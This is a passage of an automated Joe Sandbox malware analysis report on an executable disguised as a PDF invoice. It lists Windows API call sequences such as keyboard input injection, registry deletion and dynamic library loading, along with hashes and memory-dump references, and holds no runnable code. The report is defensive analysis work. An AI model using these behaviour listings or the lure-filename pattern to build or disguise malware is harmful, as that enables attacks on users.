                                                                              • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                              • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                              • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 3529120543-1011021900
                                                                              • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                              • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                              APIs
                                                                              • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                              • TranslateMessage.USER32(?), ref: 0044308B
                                                                              • DispatchMessageW.USER32(?), ref: 00443096
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                              • String ID: *.*
                                                                              • API String ID: 1795658109-438819550
                                                                              • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                              • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              • GetFocus.USER32 ref: 004609EF
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                              • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                              • __swprintf.LIBCMT ref: 00460A7A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                              • String ID: %s%d
                                                                              • API String ID: 991886796-1110647743
                                                                              • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                              • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_sprintf
                                                                              • String ID: %02X
                                                                              • API String ID: 891462717-436463671
                                                                              • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                              • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0042CD00
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                              • String ID: $OH$@OH$X
                                                                              • API String ID: 3491138722-1394974532
                                                                              • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                              • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                              • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID:
                                                                              • API String ID: 2449869053-0
                                                                              • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                              • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                              • SendInput.USER32 ref: 0044C509
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 3031425849-0
                                                                              • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                              • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 2095303065-0
                                                                              • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                              • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                              • String ID:
                                                                              • API String ID: 2832842796-0
                                                                              • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                              • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00447997
                                                                              • GetCursorPos.USER32(?), ref: 004479A2
                                                                              • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                              • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1822080540-0
                                                                              • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                              • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 659298297-0
                                                                              • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                              • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004478A7
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                              • GetCursorPos.USER32(?), ref: 00447935
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                              • String ID:
                                                                              • API String ID: 1300944170-0
                                                                              • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                              • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                              APIs
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FD1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FD1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                              • String ID:
                                                                              • API String ID: 142311417-0
                                                                              • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                              • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044955A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                              • _wcslen.LIBCMT ref: 004495C1
                                                                              • _wcslen.LIBCMT ref: 004495CE
                                                                              • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1843234404-0
                                                                              • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                              • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                              • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                              • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
